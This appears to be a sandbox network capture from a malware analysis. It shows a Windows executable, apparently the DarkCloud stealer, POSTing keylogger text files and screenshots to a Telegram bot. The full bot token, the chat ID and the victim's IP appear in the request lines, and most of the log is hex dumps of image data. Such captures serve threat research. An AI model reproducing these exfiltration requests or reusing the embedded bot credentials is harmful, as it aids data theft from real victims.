                                                                                      2024-11-25 12:40:50 UTC16355OUTData Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:50 UTC232OUTData Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-25 12:40:50 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:56 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 25 Nov 2024 12:40:56 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 600
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.649945149.154.167.2204434304C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-25 12:40:57 UTC558OUTPOST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 568
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-25 12:40:57 UTC568OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 51 42 6f 4b 58 4d 57 65 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 37 3a 34 30 3a 34 36 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 37 3a 34 30 3a 34 36 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 37 3a 34 30 3a 34 36 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataQBoKXMWe.txt"Content-Type: application/octet-stream[07:40:46]<<Program Manager>>[07:40:46]<<Program Manager>>[07:40:46]<<Program Mana
                                                                                      2024-11-25 12:40:58 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 25 Nov 2024 12:40:58 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 594
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2024-11-25 12:40:58 UTC594INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 35 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 36 35 30 36 38 30 31 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 61 72 6b 63 6c 6f 75 64 5f 52 65 73 75 6c 74 5f 62 6f 78 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 61 72 6b 63 6c 6f 75 64 5f 52 65 73 75 6c 74 5f 62 6f 78 38 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 31 31 35 38 35 30 36 38 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 68 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 6f 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 48 52 77 65 62 63 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":2538,"from":{"id":8165068013,"is_bot":true,"first_name":"Darkcloud_Result_box8","username":"Darkcloud_Result_box8_Bot"},"chat":{"id":6115850689,"first_name":"Chi","last_name":"Boy","username":"HRwebc","type":"private"},"d


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.649958149.154.167.2204434304C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-25 12:41:02 UTC562OUTPOST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-25 12:41:02 UTC16355OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 71 49 6e 68 62 48 6d 42 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotqInhbHmB.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      2024-11-25 12:41:02 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:02 UTC16355OUTData Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00
                                                                                      Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-25 12:41:02 UTC16355OUTData Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:02 UTC16355OUTData Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-25 12:41:02 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:02 UTC16355OUTData Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14
                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-25 12:41:02 UTC16355OUTData Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:02 UTC232OUTData Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-25 12:41:02 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:07 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 25 Nov 2024 12:41:07 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 600
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.649972149.154.167.2204434304C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-25 12:41:08 UTC558OUTPOST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 601
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-25 12:41:08 UTC601OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 6b 6d 72 4e 68 57 57 71 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 37 3a 34 30 3a 35 37 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 37 3a 34 30 3a 35 38 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 37 3a 34 30 3a 35 38 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDatakmrNhWWq.txt"Content-Type: application/octet-stream[07:40:57]<<Program Manager>>[07:40:58]<<Program Manager>>[07:40:58]<<Program Mana
                                                                                      2024-11-25 12:41:09 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 25 Nov 2024 12:41:09 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 595
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
